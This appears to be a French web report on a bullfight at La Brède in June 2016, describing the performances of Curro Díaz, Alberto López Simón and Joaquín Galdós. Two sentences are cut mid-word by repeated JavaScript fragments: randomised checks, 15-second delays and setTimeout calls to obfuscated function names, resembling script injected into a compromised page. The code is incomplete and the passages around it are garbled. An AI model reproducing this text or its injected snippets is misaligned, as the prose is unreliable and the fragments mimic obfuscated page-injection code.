ARÔMES ET POUVOIR

La Brède, samedi 25 juin 2016. Par son attitude, sa gestuelle, sa façon de manier les leurres même si les passes étaient parfois incomplètes, Curro Díaz a séduit l’aficion de ces arènes proches de Bordeaux. Mais en plus des arômes que dégage son toreo, il a surpris par sa maîtrise, sa détermination. Son lot de Fuente Ymbro n’était pas là pour lui faciliter les choses. Le premier était sorti avec un bon feeling mais il fut renvoyé après s’être cassé une corne.

Le remplaçant eut peu de classe et une charge décroissante, mais Curro ne cessa d’y croire et même à la mise à la mort il s’engagea à fond et faillit se faire prendre. L’épée était tombée un peu basse mais l’oreille était largement méritée. Il en coupa deux à son suivant dans une faena inattendue, improbable, car le toro s’employait peu, était distrait et sur la réserve. Le torero de Linares lui soutira des passes, des demi-charges pour aboutir à des enchaînements qui surprirent le public, les aficionados et les professionnels. Faena vibrante et intelligence, une preuve supplémentaire du grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and moment que traverse ce torero.

Alberto López Simón avait une dette envers l’aficion de ces arènes car il avait fait faux bond l’année dernière et il avait promis de revenir cette année. Il a tenu sa parole mais il a été confronté à un lot peu reluisant. Noble son premier, mais trop faible, il s’affalait si on le forçait et il était par ailleurs assez fade. Le madrilène lui endossa une longue faena, avec de suaves passes de muleta mais sans éco sur les gradins. Le cinquième fut un toro qui donnait des coups de tête partout mais impossible de fixer sa charge, de sorte que le torero ne put en aucun cas briller.

Il y eut un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and toro de Fuente Ymbro, le troisième, avec beaucoup de qualité et de parcours. Le péruvien Joaquín Galdós fit une bonne prestation, mais un peu sur la retenue, il ne se laissa point porter et finalement il ne coupa qu’une oreille alors qu’il aurait pu en couper deux. Il a été tenace devant le dernier de la corrida qui avait un problème de motricité et était très difficile à fixer.

Les commentaires sont fermés.